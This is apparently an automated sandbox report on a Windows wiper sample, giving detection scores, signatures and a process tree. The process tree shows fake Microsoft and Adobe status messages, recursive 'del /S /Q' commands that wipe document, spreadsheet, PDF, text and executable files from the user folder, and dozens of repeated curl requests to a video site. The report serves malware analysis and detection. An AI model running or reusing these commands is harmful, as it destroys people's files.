Play interactive tour

Edit tour

Windows Analysis Report Z0hOr2pD7k

Overview

General Information

Sample Name:	Z0hOr2pD7k (renamed file extension from none to exe)
Analysis ID:	452577
MD5:	8edf0aa789d976df0c80fd8d62734ded
SHA1:	54a8b718fda1ea749df17271d3f897c947004483
SHA256:	fb80dab592c5b2a1dcaaf69981c6d4ee7dbf6c1f25247e2ab648d4d0dc115a97
Tags:	exeupxwiper
Infos:
Most interesting Screenshot:

Detection

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to detect virtual machines (IN, VMware)

Deletes itself after installation

Machine Learning detection for sample

Tries to harvest and steal browser information (history, passwords, etc)

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Program does not show much activity (idle)

Sample execution stops while process was sleeping (likely an evasion)

Too many similar processes found

Uses 32bit PE files

Yara signature match

Classification

Process Tree

System is w10x64

Z0hOr2pD7k.exe (PID: 6552 cmdline: 'C:\Users\user\Desktop\Z0hOr2pD7k.exe' MD5: 8EDF0AA789D976DF0C80FD8D62734DED)

conhost.exe (PID: 6560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6608 cmdline: C:\Windows\system32\cmd.exe /c echo Microsoft Windows 10 self error check has been ready... MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 6632 cmdline: C:\Windows\system32\cmd.exe /c echo Copyright (C) 2003-2015 Microsoft Corporation MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 6664 cmdline: C:\Windows\system32\cmd.exe /c echo Copyright (C) 2003-2021 Adobe Corporation MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 7064 cmdline: C:\Windows\system32\cmd.exe /c echo DO NOT STOP THE PROCESS MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 7076 cmdline: C:\Windows\system32\cmd.exe /c echo Wait a minute... MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 7088 cmdline: C:\Windows\system32\cmd.exe /c @echo OFF MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 7100 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.doc c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 6248 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.docm c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 6304 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.docx c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 6364 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.dot c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 1280 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.dotm c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 6940 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.dotx c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 6136 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.pdf c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 2820 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.csv c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 3148 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.xls c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 3560 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.xlsx c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 772 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.xlsm c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 5252 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.ppt c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 6256 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.pptx c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 5876 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.pptm c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 492 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.jtdc c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 6228 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.jttc c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 5040 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.jtd c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 6024 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.jtt c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 1000 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.txt c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 6312 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.exe c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 6160 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.log c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 6364 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 1280 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 3660 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 6604 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 6904 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 7148 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 7020 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 1424 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 6820 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 6860 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 6892 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 6932 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 6968 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 6804 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 4664 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 4524 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 6940 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 6388 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 1296 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 5748 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 6992 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 6724 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 5912 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 1020 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 6504 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 4592 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 796 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 4420 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 2016 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 7124 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 2812 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 4228 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 1904 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 1568 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 4944 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 5352 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: Z0hOr2pD7k.exe

Avira: detected

Multi AV Scanner detection for submitted file

Show sources

Source: Z0hOr2pD7k.exe	Virustotal: Detection: 55%	Perma Link
Source: Z0hOr2pD7k.exe	Metadefender: Detection: 20%	Perma Link
Source: Z0hOr2pD7k.exe	ReversingLabs: Detection: 39%

Machine Learning detection for sample

Show sources

Source: Z0hOr2pD7k.exe

Joe Sandbox ML: detected

Source: 0.0.Z0hOr2pD7k.exe.9c0000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen2

Source: Z0hOr2pD7k.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: Z0hOr2pD7k.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: Z0hOr2pD7k.exe, 00000000.00000002.917145240.00000000010FD000.00000004.00000001.sdmp	String found in binary or memory: https://www.xvideos.com
Source: Z0hOr2pD7k.exe, 00000000.00000002.917145240.00000000010FD000.00000004.00000001.sdmp	String found in binary or memory: https://www.xvideos.com/video64080443/_

Source: cmd.exe

Process created: 123

Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Code function: 0_2_009C14A0		0_2_009C14A0
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Code function: 0_2_009C15A0		0_2_009C15A0

Source: Z0hOr2pD7k.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 0.2.Z0hOr2pD7k.exe.9c0000.0.unpack, type: UNPACKEDPE

Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27

Source: classification engine

Classification label: mal76.spyw.evad.winEXE@128/22@0/0

Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe

Code function: 0_2_009C10D0 72A73930,CreateToolhelp32Snapshot,Process32First,Process32First,76A06610,76A06610,Process32Next,76A06610,GetClassNameA,76A06610,76A06610,

0_2_009C10D0

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6560:120:WilError_01

Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Z0hOr2pD7k.exe	Virustotal: Detection: 55%
Source: Z0hOr2pD7k.exe	Metadefender: Detection: 20%
Source: Z0hOr2pD7k.exe	ReversingLabs: Detection: 39%

Source: unknown	Process created: C:\Users\user\Desktop\Z0hOr2pD7k.exe 'C:\Users\user\Desktop\Z0hOr2pD7k.exe'
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Microsoft Windows 10 self error check has been ready...
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Copyright (C) 2003-2015 Microsoft Corporation
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Copyright (C) 2003-2021 Adobe Corporation
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo DO NOT STOP THE PROCESS
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Wait a minute...
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c @echo OFF
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.doc c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.docm c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.docx c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dot c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotm c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotx c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pdf c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.csv c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xls c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xlsx c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xlsm c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.ppt c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pptx c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pptm c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jtdc c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jttc c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jtd c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jtt c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.txt c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.exe c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.log c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
